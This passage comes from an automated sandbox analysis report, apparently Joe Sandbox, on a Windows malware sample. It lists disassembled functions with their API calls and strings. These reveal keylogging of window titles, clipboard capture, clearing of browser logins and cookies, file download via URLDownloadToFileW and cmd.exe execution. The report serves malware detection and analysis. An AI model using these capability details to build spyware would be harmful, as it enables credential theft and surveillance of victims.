                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseCreateValue
                                                              • String ID: Control Panel\Desktop
                                                              • API String ID: 1818849710-27424756
                                                              • Opcode ID: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                                                              • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                                              • Opcode Fuzzy Hash: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                                                              • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                                              Function 00416C68 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                              • ShowWindow.USER32(00000009), ref: 00416C9C
                                                              • SetForegroundWindow.USER32 ref: 00416CA8
                                                                • Part of subcall function 0041CE2C: AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                                                • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                                              • String ID: !D@
                                                              • API String ID: 3446828153-604454484
                                                              • Opcode ID: 4d9bf94020eca6f9e295162147b2deb229949cce80f8bc9c3a6d36dbd144fb99
                                                              • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                                              • Opcode Fuzzy Hash: 4d9bf94020eca6f9e295162147b2deb229949cce80f8bc9c3a6d36dbd144fb99
                                                              • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                                              Function 00416129 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExecuteShell
                                                              • String ID: /C $cmd.exe$open
                                                              • API String ID: 587946157-3896048727
                                                              • Opcode ID: df79394fdd2e8ac4c6a51a4d6bf5cb7422c6ad95fc7d3df390015c01fd08e55b
                                                              • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                              • Opcode Fuzzy Hash: df79394fdd2e8ac4c6a51a4d6bf5cb7422c6ad95fc7d3df390015c01fd08e55b
                                                              • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                              Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: GetCursorInfo$User32.dll
                                                              • API String ID: 1646373207-2714051624
                                                              • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                              • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                                              • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                              • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                                              Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                                              • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetLastInputInfo$User32.dll
                                                              • API String ID: 2574300362-1519888992
                                                              • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                              • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                                                              • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                              • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                                                              Function 00456C9A Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                              • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                              • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                              • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                              Function 0040C047 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • Cleared browsers logins and cookies., xrefs: 0040C130
                                                              • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                              • API String ID: 3472027048-1236744412
                                                              • Opcode ID: 857d3cd121560083d8ce3f08402db4584d0000cc5e9f96a8e1a49aed9ab164ab
                                                              • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                                                              • Opcode Fuzzy Hash: 857d3cd121560083d8ce3f08402db4584d0000cc5e9f96a8e1a49aed9ab164ab
                                                              • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                                                              Function 0040A564 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0041C5E2: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C5F2
                                                                • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                                                • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C625
                                                              • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                              • Sleep.KERNEL32(00000064), ref: 0040A638
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Window$SleepText$ForegroundLength
                                                              • String ID: [ $ ]
                                                              • API String ID: 3309952895-93608704
                                                              • Opcode ID: 0877f6620f6187a1062b87b3f34e88cc83cbee9ae63c8039862e0d8bb1bff125
                                                              • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                              • Opcode Fuzzy Hash: 0877f6620f6187a1062b87b3f34e88cc83cbee9ae63c8039862e0d8bb1bff125
                                                              • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                              Function 00443AD3 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                              • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                                              • Opcode Fuzzy Hash: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                              • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                                              Function 00443B52 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                              • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                                              • Opcode Fuzzy Hash: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                              • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                                              Function 0041C516 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                                              • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C543
                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C568
                                                              • CloseHandle.KERNEL32(00000000,?,00000000,0040412F,00465E84), ref: 0041C576
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$CloseCreateHandleReadSize
                                                              • String ID:
                                                              • API String ID: 3919263394-0
                                                              • Opcode ID: 253de0e05f1e183a51722a251bf095503662c065c08e6289a01aaeef394dcb57
                                                              • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                                              • Opcode Fuzzy Hash: 253de0e05f1e183a51722a251bf095503662c065c08e6289a01aaeef394dcb57
                                                              • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                                              Function 0041C26E Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                              • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2C4
                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2CC
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseHandleOpenProcess
                                                              • String ID:
                                                              • API String ID: 39102293-0
                                                              • Opcode ID: 81942e7addce2a1bdc39bfb83f2669cd8d6753e4bd6c5855ff2ce9cbe7850470
                                                              • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                                                              • Opcode Fuzzy Hash: 81942e7addce2a1bdc39bfb83f2669cd8d6753e4bd6c5855ff2ce9cbe7850470
                                                              • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
                                                              Function 004398E3 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                                • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                                              • _UnwindNestedFrames.LIBCMT ref: 00439911
                                                              • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                                              • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                              • String ID:
                                                              • API String ID: 2633735394-0
                                                              • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                              • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                                              • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                              • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                                              Function 0041941E Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSystemMetrics.USER32(0000004C), ref: 0041942B
                                                              • GetSystemMetrics.USER32(0000004D), ref: 00419431
                                                              • GetSystemMetrics.USER32(0000004E), ref: 00419437
                                                              • GetSystemMetrics.USER32(0000004F), ref: 0041943D
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MetricsSystem
                                                              • String ID:
                                                              • API String ID: 4116985748-0
                                                              • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                              • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                                              • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                              • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                                              Function 00438FB1 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                                • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                              • String ID:
                                                              • API String ID: 1761009282-0
                                                              • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                              • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                                              • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                              • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                                              Function 00442CAD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorHandling__start
                                                              • String ID: pow
                                                              • API String ID: 3213639722-2276729525
                                                              • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                              • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                                              • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                              • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                                              Function 00449EBC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • WideCharToMultiByte.KERNEL32(000000FF,00000000,00000006,00000001,?,?,00000000,?,00000000,?,?,00000000,00000006,?,?,?), ref: 00449F8F
                                                              • GetLastError.KERNEL32 ref: 00449FAB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharErrorLastMultiWide
                                                              • String ID: PkGNG
                                                              • API String ID: 203985260-263838557
                                                              • Opcode ID: d1185fb95bfff78fff583c453b007e19375680cfc0f7d37f8e74ebb942ffdfee
                                                              • Instruction ID: e4919e29a80df6b7ced925805d10dfcffaa1b378e184719e11b938f1b8f94c7b
                                                              • Opcode Fuzzy Hash: d1185fb95bfff78fff583c453b007e19375680cfc0f7d37f8e74ebb942ffdfee
                                                              • Instruction Fuzzy Hash: 2331E430200201ABFB21EF56C845BAB7768EF45721F15016BF815C7391DB38CD45E7A9
                                                              Function 0040B783 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                              • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Init_thread_footer__onexit
                                                              • String ID: [End of clipboard]$[Text copied to clipboard]
                                                              • API String ID: 1881088180-3686566968
                                                              • Opcode ID: 7be63757e29b9f91be4cc1fce50211db745ac7e2ddcf3fa0e25e131e1c8bf245
                                                              • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                                              • Opcode Fuzzy Hash: 7be63757e29b9f91be4cc1fce50211db745ac7e2ddcf3fa0e25e131e1c8bf245
                                                              • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                                              Function 00451BB7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ACP$OCP
                                                              • API String ID: 0-711371036
                                                              • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                              • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                                              • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                              • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                                              Function 0044B7B1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BBEE,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B85B
                                                              • GetLastError.KERNEL32 ref: 0044B884
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID: PkGNG
                                                              • API String ID: 442123175-263838557
                                                              • Opcode ID: 9f33f136d580808b36a549075194831cac44b680ed95d57240af363647088f83
                                                              • Instruction ID: 9972a58bdd01e134d13becd973f3089a2f7b3635eb9ddb95e5d59f4384582b5e
                                                              • Opcode Fuzzy Hash: 9f33f136d580808b36a549075194831cac44b680ed95d57240af363647088f83
                                                              • Instruction Fuzzy Hash: B2316F31A00619DBCB24DF59DD8099AF3F9FF48301B1485AAE909D7261E734ED81CBA8
                                                              Function 0044B6D2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BC0E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B76D
                                                              • GetLastError.KERNEL32 ref: 0044B796
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID: PkGNG
                                                              • API String ID: 442123175-263838557
                                                              • Opcode ID: 482fa6ac77512a0fc819500aa413458c203250297fd7de672378db3e029a087c
                                                              • Instruction ID: c865f2f287ade0309940dd9d446f9ab1351fd896516eb6f8948e0fb5ca6ebdce
                                                              • Opcode Fuzzy Hash: 482fa6ac77512a0fc819500aa413458c203250297fd7de672378db3e029a087c
                                                              • Instruction Fuzzy Hash: 69219435600219DFDB14CF69D980BEAB3F9EB48312F1048AAE94AD7251D734ED85CB64
                                                              Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                              • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                              Strings
                                                              • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LocalTime
                                                              • String ID: KeepAlive | Enabled | Timeout:
                                                              • API String ID: 481472006-1507639952
                                                              • Opcode ID: 145f269d181a8435875c36411829170d0c63d951855ea4e88e6edb1186bb4574
                                                              • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                                              • Opcode Fuzzy Hash: 145f269d181a8435875c36411829170d0c63d951855ea4e88e6edb1186bb4574
                                                              • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                                                              Function 00416676 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Sleep.KERNEL32 ref: 0041667B
                                                              • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DownloadFileSleep
                                                              • String ID: !D@
                                                              • API String ID: 1931167962-604454484
                                                              • Opcode ID: 55e5d64e7b98f77c9516b1aa3147275b9d54505b18039c208d99df416d007d74
                                                              • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                                                              • Opcode Fuzzy Hash: 55e5d64e7b98f77c9516b1aa3147275b9d54505b18039c208d99df416d007d74
                                                              • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                                              Function 0041ADA8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                                              Strings
                                                              Memory Dump Source
